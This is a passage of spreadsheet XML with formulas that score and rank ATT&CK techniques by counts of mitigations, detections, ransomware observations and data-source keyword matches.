        <f t="array" ref="AJ373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK373" s="25">
        <f>IF(AJ373="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL373" s="25" t="str" cm="1">
        <f t="array" ref="AL373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM373" s="25">
        <f>IF(AL373="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN373" s="58">
        <v>0</v>
      </c>
      <c r="AO373" s="51">
        <v>0</v>
      </c>
      <c r="AP373" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2819047619047617E-2</v>
      </c>
      <c r="AQ373" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.6063492063492055E-2</v>
      </c>
      <c r="AR373" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.6063492063492055E-2</v>
      </c>
      <c r="AS373" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT373" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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74" spans="1:47">
      <c r="A374" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.5238095238095238E-2</v>
      </c>
      <c r="B374" s="25">
        <f>SUM(H374,M374,V374)*(1+SUM(AE374,AG374,AI374,AK374,AM374))</f>
        <v>0.18571428571428572</v>
      </c>
      <c r="C374" s="25" t="s">
        <v>1475</v>
      </c>
      <c r="D374" s="25" t="s">
        <v>1016</v>
      </c>
      <c r="E374" s="25" t="s">
        <v>1476</v>
      </c>
      <c r="F374" s="51">
        <v>1</v>
      </c>
      <c r="G374" s="51">
        <v>1</v>
      </c>
      <c r="H374" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I374">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J374">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K374">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L374">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M374" s="25">
        <v>0</v>
      </c>
      <c r="N374" s="51">
        <v>0</v>
      </c>
      <c r="O374" s="51">
        <v>5</v>
      </c>
      <c r="P374" s="51">
        <v>0</v>
      </c>
      <c r="Q374" s="51">
        <v>1</v>
      </c>
      <c r="R374" s="52" t="s">
        <v>1017</v>
      </c>
      <c r="S374" s="51">
        <v>3</v>
      </c>
      <c r="T374" s="52" t="s">
        <v>1477</v>
      </c>
      <c r="U374" s="51">
        <v>3</v>
      </c>
      <c r="V374" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W374">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X374">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y374">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z374">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA374">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB374">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC374" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD374" s="25" t="str" cm="1">
        <f t="array" ref="AD374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC374)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE374" s="25">
        <f>IF(AD374="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF374" s="25" t="str" cm="1">
        <f t="array" ref="AF374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC374)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG374" s="25">
        <f>IF(AF374="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH374" s="25" t="str" cm="1">
        <f t="array" ref="AH374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC374)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI374" s="25">
        <f>IF(AH374="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ374" s="25" t="str" cm="1">
        <f t="array" ref="AJ374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC374)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK374" s="25">
        <f>IF(AJ374="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL374" s="25" t="str" cm="1">
        <f t="array" ref="AL374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC374)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM374" s="25">
        <f>IF(AL374="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN374" s="52">
        <v>2</v>
      </c>
      <c r="AO374" s="51">
        <v>1</v>
      </c>
      <c r="AP374" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.5238095238095238E-2</v>
      </c>
      <c r="AQ374" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="AR374" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="AS374" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT374" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU37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75" spans="1:47" ht="32.1">
      <c r="A375" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.8915238095238089E-2</v>
      </c>
      <c r="B375" s="25">
        <f>SUM(H375,M375,V375)*(1+SUM(AE375,AG375,AI375,AK375,AM375))</f>
        <v>0.22248571428571429</v>
      </c>
      <c r="C375" s="25" t="s">
        <v>1478</v>
      </c>
      <c r="D375" s="25" t="s">
        <v>894</v>
      </c>
      <c r="E375" s="25" t="s">
        <v>1479</v>
      </c>
      <c r="F375" s="51">
        <v>1</v>
      </c>
      <c r="G375" s="51">
        <v>1</v>
      </c>
      <c r="H375" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I375">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J375">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K375">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L375">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M375" s="25">
        <v>0</v>
      </c>
      <c r="N375" s="51">
        <v>0</v>
      </c>
      <c r="O375" s="51">
        <v>0</v>
      </c>
      <c r="P375" s="51">
        <v>0</v>
      </c>
      <c r="Q375" s="51">
        <v>0</v>
      </c>
      <c r="R375" s="52" t="s">
        <v>511</v>
      </c>
      <c r="S375" s="51">
        <v>9</v>
      </c>
      <c r="T375" s="51"/>
      <c r="U375" s="51">
        <v>0</v>
      </c>
      <c r="V375" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W375">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X375">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y375">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z375">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA375">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB375">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC375" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD375" s="25" t="str" cm="1">
        <f t="array" ref="AD375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC375)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE375" s="25">
        <f>IF(AD375="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF375" s="25" t="str" cm="1">
        <f t="array" ref="AF375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG375" s="25">
        <f>IF(AF375="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH375" s="25" t="str" cm="1">
        <f t="array" ref="AH375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI375" s="25">
        <f>IF(AH375="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ375" s="25" t="str" cm="1">
        <f t="array" ref="AJ375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK375" s="25">
        <f>IF(AJ375="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL375" s="25" t="str" cm="1">
        <f t="array" ref="AL375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM375" s="25">
        <f>IF(AL375="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN375" s="60">
        <v>2</v>
      </c>
      <c r="AO375" s="51">
        <v>1</v>
      </c>
      <c r="AP375" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.8915238095238089E-2</v>
      </c>
      <c r="AQ375" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AR375" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4161904761904762E-2</v>
      </c>
      <c r="AS375" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT375" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU37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76" spans="1:47" ht="32.1">
      <c r="A376" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.803333333333334E-2</v>
      </c>
      <c r="B376" s="25">
        <f>SUM(H376,M376,V376)*(1+SUM(AE376,AG376,AI376,AK376,AM376))</f>
        <v>0.24700000000000003</v>
      </c>
      <c r="C376" s="25" t="s">
        <v>1480</v>
      </c>
      <c r="D376" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E376" s="25" t="s">
        <v>1481</v>
      </c>
      <c r="F376" s="51">
        <v>1</v>
      </c>
      <c r="G376" s="51">
        <v>1</v>
      </c>
      <c r="H376" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I376">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J376">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K376">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L376">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M376" s="25">
        <v>0</v>
      </c>
      <c r="N376" s="51">
        <v>0</v>
      </c>
      <c r="O376" s="51">
        <v>0</v>
      </c>
      <c r="P376" s="51">
        <v>0</v>
      </c>
      <c r="Q376" s="51">
        <v>0</v>
      </c>
      <c r="R376" s="51" t="s">
        <v>1275</v>
      </c>
      <c r="S376" s="51">
        <v>3</v>
      </c>
      <c r="T376" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U376" s="51">
        <v>6</v>
      </c>
      <c r="V376" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W376">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X376">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y376">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z376">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA376">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB376">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC376" s="29" t="s">
        <v>519</v>
      </c>
      <c r="AD376" s="25" t="str" cm="1">
        <f t="array" ref="AD376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC376)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE376" s="25">
        <f>IF(AD376="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF376" s="25" t="str" cm="1">
        <f t="array" ref="AF376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC376)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG376" s="25">
        <f>IF(AF376="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH376" s="25" t="str" cm="1">
        <f t="array" ref="AH376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC376)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI376" s="25">
        <f>IF(AH376="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ376" s="25" t="str" cm="1">
        <f t="array" ref="AJ376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC376)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK376" s="25">
        <f>IF(AJ376="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL376" s="25" t="str" cm="1">
        <f t="array" ref="AL376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC376)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM376" s="25">
        <f>IF(AL376="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN376" s="59">
        <v>1</v>
      </c>
      <c r="AO376" s="51">
        <v>1</v>
      </c>
      <c r="AP376" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.803333333333334E-2</v>
      </c>
      <c r="AQ376" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AR376" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AS376" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT376" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU37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77" spans="1:47">
      <c r="A377" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.803333333333334E-2</v>
      </c>
      <c r="B377" s="25">
        <f>SUM(H377,M377,V377)*(1+SUM(AE377,AG377,AI377,AK377,AM377))</f>
        <v>0.24700000000000003</v>
      </c>
      <c r="C377" s="25" t="s">
        <v>1482</v>
      </c>
      <c r="D377" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E377" s="25" t="s">
        <v>1483</v>
      </c>
      <c r="F377" s="51">
        <v>1</v>
      </c>
      <c r="G377" s="51">
        <v>1</v>
      </c>
      <c r="H377" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I377">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J377">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K377">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L377">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M377" s="25">
        <v>0</v>
      </c>
      <c r="N377" s="51">
        <v>0</v>
      </c>
      <c r="O377" s="51">
        <v>0</v>
      </c>
      <c r="P377" s="51">
        <v>0</v>
      </c>
      <c r="Q377" s="51">
        <v>0</v>
      </c>
      <c r="R377" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S377" s="51">
        <v>3</v>
      </c>
      <c r="T377" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U377" s="51">
        <v>6</v>
      </c>
      <c r="V377" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>8.5714285714285715E-2</v>
      </c>
      <c r="W377">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X377">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y377">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z377">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA377">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB377">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC377" s="29" t="s">
        <v>1484</v>
      </c>
      <c r="AD377" s="25" t="str" cm="1">
        <f t="array" ref="AD377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC377)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE377" s="25">
        <f>IF(AD377="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF377" s="25" t="str" cm="1">
        <f t="array" ref="AF377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC377)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG377" s="25">
        <f>IF(AF377="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH377" s="25" t="str" cm="1">
        <f t="array" ref="AH377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC377)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI377" s="25">
        <f>IF(AH377="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ377" s="25" t="str" cm="1">
        <f t="array" ref="AJ377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC377)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK377" s="25">
        <f>IF(AJ377="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL377" s="25" t="str" cm="1">
        <f t="array" ref="AL377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC377)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM377" s="25">
        <f>IF(AL377="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN377" s="58">
        <v>1</v>
      </c>
      <c r="AO377" s="51">
        <v>1</v>
      </c>
      <c r="AP377" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.803333333333334E-2</v>
      </c>
      <c r="AQ377" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AR377" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.2333333333333342E-2</v>
      </c>
      <c r="AS377" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT377" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU37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78" spans="1:47">
